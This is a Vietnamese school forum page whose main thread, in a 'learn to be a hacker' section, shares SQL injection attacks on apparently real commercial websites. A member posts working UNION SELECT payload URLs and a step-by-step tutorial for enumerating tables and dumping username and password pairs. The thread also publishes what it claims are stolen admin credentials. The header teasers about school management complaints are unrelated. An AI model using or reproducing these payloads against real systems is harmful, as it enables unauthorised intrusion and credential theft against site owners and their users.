http://www.ddtqk.8forum.net
http://www.ddtqk.8forum.net

http://www.ddtqk.8forum.net

DIỄN ĐÀN DO GIÁO VIÊN TRƯỜNG LẬP VỚI PHƯƠNG CHÂM HOẠT ĐỘNG DÂN CHỦ - KỈ CƯƠNG - TÌNH THƯƠNG - TRÁCH NHIỆM
 
Trang ChínhPortalLatest imagesTìm kiếmĐăng kýĐăng Nhập
News & Announcements
  • DIỄN ĐÀN DÂN CHỦ - TQK Q11
KẾT NẠP ĐẢNG VIÊN TRƯỜNG
share anh em 1 site đã đc chiếm I_icon_minitimeDecember 5th 2014, 06:21 by Anonymous
- Tôi xin nói thẳng ra như vầy, đáng lý phải chọn ra những thành phần giáo viên ưu tú nhất của trường để kết nạp vào Đảng thì trường mình ngược lại, những người được kết nạp vào Đảng trong thời gian gần đây không phải là các giáo viên ưu tú nhất của trường. Xin hiệu trưởng coi lại bởi tôi đóng góp trong chi bộ mất công ……

Comments: 0
"Chấm ngày giờ công giáo viên" : Chấm bố láo không thể chịu nổi
share anh em 1 site đã đc chiếm I_icon_minitimeAugust 31st 2014, 20:45 by Anonymous
- Tôi, đại diện cho tập thể anh chị em giáo viên nhà trường xin gửi đến BAN GIÁM HIỆU TRƯỜNG THPT TRẦN QUANG KHẢI QUẬN 11 thông điệp "Chấm ngày giờ công giáo viên" : Chấm bố láo không thể chịu nổi kéo dài nhiều năm qua, dẫn đến hệ lụy là hầu như toàn bộ giáo viên trường bức xúc với vấn đề này. Đề …

[ Full reading ]
Comments: 1
ÉP GIÁO VIÊN CHỦ NHIỆM THU TIỀN TĂNG TIẾT
share anh em 1 site đã đc chiếm I_icon_minitimeNovember 24th 2014, 02:24 by Anonymous
- Học sinh tăng tiết thì các giáo viên chủ nhiệm môn phụ như tôi?? Được hưởng lợi lộc gì từ nguồn thu này???

- Sở GD đã ban hành hướng dẫn số : 4012/HD/GDĐT-KHTC ngày 11-11-2014 quy định rõ : Mức thu dạy thêm, học thêm được thu theo định kỳ hàng tháng, khi thu phải cấp biên lai thu tiền cho từng học sinh thông …

[ Full reading ]
Comments: 0

 

 share anh em 1 site đã đc chiếm

Go down 
2 posters
Tác giảThông điệp
Dân Phòng
thượng sĩ
thượng sĩ
Dân Phòng


Tổng số bài gửi : 109
Join date : 02/08/2011
Age : 33
Đến từ : Oriflame - Group Passion

share anh em 1 site đã đc chiếm Empty
Bài gửiTiêu đề: share anh em 1 site đã đc chiếm   share anh em 1 site đã đc chiếm I_icon_minitimeAugust 4th 2011, 14:27

http://www.dibiuk.com/product_details.php?product_id=-12 UNION SELECT 1,2,3,4,5,6,7,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--
Về Đầu Trang Go down
http://mumauden.com
Admin
Admin
Admin


Tổng số bài gửi : 119
Join date : 24/07/2010
Age : 63
Đến từ : TP.HCM

share anh em 1 site đã đc chiếm Empty
Bài gửiTiêu đề: Re: share anh em 1 site đã đc chiếm   share anh em 1 site đã đc chiếm I_icon_minitimeAugust 5th 2011, 02:05

- Em vui lòng chỉ dẫn cách thức hack để mọi người thưởng thức.
- Thấy trang thầy Tặng hôm bị tấn công, admin nghi rằng kẻ tấn công lợi dụng lỗi mã nguồn của cbox, từ đó đưa 1 hình ảnh có chứa mã nguồn độc vào............ tấn công. Không biết có phải như vậy không, ai biết phân tích coi??
Về Đầu Trang Go down
http://diendantqk.8forum.net
Dân Phòng
thượng sĩ
thượng sĩ
Dân Phòng


Tổng số bài gửi : 109
Join date : 02/08/2011
Age : 33
Đến từ : Oriflame - Group Passion

share anh em 1 site đã đc chiếm Empty
Bài gửiTiêu đề: Re: share anh em 1 site đã đc chiếm   share anh em 1 site đã đc chiếm I_icon_minitimeAugust 5th 2011, 17:11

http://www.dibiuk.com/product_details.php?product_id=-12 "id=-12" là lỗi mà em tìm đc = cách thử.

Sau đây em xin lấy 1 VD để giải cho Admin và các Mem cùng hiểu và thực hành ngay trên vd của em. Em xin phép dùng từ "Ta" để nói chung

VD: web "http://www.whamster.com/viewProduct.php?ID=485"có "id=485" thử "id=485' " nó hiện ra thế này "Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/sites/whamster.com/public_html/viewProduct.php" vậy là dính lỗi.
+ Ta dựa vào lỗi đó tìm Order như sau:
"http://www.whamster.com/viewProduct.php?ID=485 oder by 1-- -" (tùy chọn order by ??-- -)

ta phát hiện đc 28 cột và số cột lỗi nằm ở vị trí 18-14. Chọn đại 1 trong 2 số đó. Ta chọn số 14.
+ Tìm version trước:"http://www.whamster.com/viewProduct.php?ID=-485 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25,26,27,28-- -"
Version tìm đc: 5.1.56

+ Ta tìm tiếp theo là database:"http://www.whamster.com/viewProduct.php?ID=-485 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(table_name),15,16,17,18,19,20,21,22,23,24,25,26,27,28 from information_schema.tables where table_schema=database()-- -

Khi Enter bước này Site sẽ xuất ra các USERS. Nhìu quá chọn đại đi há users vậy

+ Tiếp theo ta tìm Column như sau:
"http://www.whamster.com/viewProduct.php?ID=-485 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(column_name),15,16,17,18,19,20,21,22,23,24,25,26,27,28 from information_schema.columns where table_name=0x7573657273-- -". Như đã nói trên ta Down hackbar addon từ gu gồ nhé."0xusers = 0x7573657273".Bôi đen users ở dòng 0xusers chọn trên thanh hackbar Encoding->Hex Encoding->String to 00ff00ff

Khi Enter xong bước này thì ta có đc CSDL như sau:"ID,Username,Password,Level,Author,Email"

+ Ta chọn "Username,Password"
"http://www.whamster.com/viewProduct.php?ID=-485 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(Username,0x7c,Password),15,16,17,18,19,20,21,22,23,24,25,26,27,28 from users-- -"
Lấy users nào thì trả về from đúng như thế

+ Cuối cùng kết quả ta thu đc là: steveb|Whamskiff49
Đây là ví dụ nhé. Tài khoản đó đã bị đổi Pass rồi.
Hack để học hỏi chứ ko nên phá nhé lol! lol!

Nếu trình bày thế mọi người k hiểu thì cứ hỏi nhé. h101
Về Đầu Trang Go down
http://mumauden.com
Dân Phòng
thượng sĩ
thượng sĩ
Dân Phòng


Tổng số bài gửi : 109
Join date : 02/08/2011
Age : 33
Đến từ : Oriflame - Group Passion

share anh em 1 site đã đc chiếm Empty
Bài gửiTiêu đề: Re: share anh em 1 site đã đc chiếm   share anh em 1 site đã đc chiếm I_icon_minitimeAugust 5th 2011, 17:30

Trong lúc trình bày còn nhiều thiếu sót k lường trước đc nên MOD mong các Mem và Admin thứ lỗi và bổ sung cho MOD nhé. Rất cám ơn sự ủng hộ của Admin và các Mem

Còn bây giờ hãy lao vào thực hành cho thuần thục nhé. Đó là những chiêu cơ bản thôi. h39
Về Đầu Trang Go down
http://mumauden.com
Dân Phòng
thượng sĩ
thượng sĩ
Dân Phòng


Tổng số bài gửi : 109
Join date : 02/08/2011
Age : 33
Đến từ : Oriflame - Group Passion

share anh em 1 site đã đc chiếm Empty
Bài gửiTiêu đề: Re: share anh em 1 site đã đc chiếm   share anh em 1 site đã đc chiếm I_icon_minitimeAugust 5th 2011, 17:34

Mem nào mún học thì hãy vào http://mumauden.com/for@m@/. Trong đó sẽ có nhìu đàn anh đàn chị có Topic dạy cho Newbie đó. Cố lên nhé. Học hack ko phải để quậy mà để học hỏi và tìm hiểu thôi. lol! h13 h101 h39
Về Đầu Trang Go down
http://mumauden.com
Dân Phòng
thượng sĩ
thượng sĩ
Dân Phòng


Tổng số bài gửi : 109
Join date : 02/08/2011
Age : 33
Đến từ : Oriflame - Group Passion

share anh em 1 site đã đc chiếm Empty
Bài gửiTiêu đề: Re: share anh em 1 site đã đc chiếm   share anh em 1 site đã đc chiếm I_icon_minitimeAugust 6th 2011, 04:40

http://www.dibiuk.com/product_details.php?product_id=-12 UNION SELECT 1,2,3,4,5,6,7,group_concat(user_name,0x7c,user_password),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from cycleshopnew_admin-- -

ID: Admin
Pass: limlom72
Về Đầu Trang Go down
http://mumauden.com
Sponsored content





share anh em 1 site đã đc chiếm Empty
Bài gửiTiêu đề: Re: share anh em 1 site đã đc chiếm   share anh em 1 site đã đc chiếm I_icon_minitime

Về Đầu Trang Go down
 
share anh em 1 site đã đc chiếm
Về Đầu Trang 
Trang 1 trong tổng số 1 trang
 Similar topics
-
» Lại 1 site nữa đã đc tui chiếm
» Cho anh em 1 site vừa chiếm dc User & Pass nè
» Share thêm site loại nâng cao cho Newbie nè. Biết pass thôi đừng phá nhé
» Share cho ae cái host 000a.biz
» Tut Hack Site SQL dạng khó( Forbiden 403)

Permissions in this forum:Bạn không có quyền trả lời bài viết
http://www.ddtqk.8forum.net  :: GÓC CÔNG NGHỆ THÔNG TIN :: Tập làm Hacker-
Chuyển đến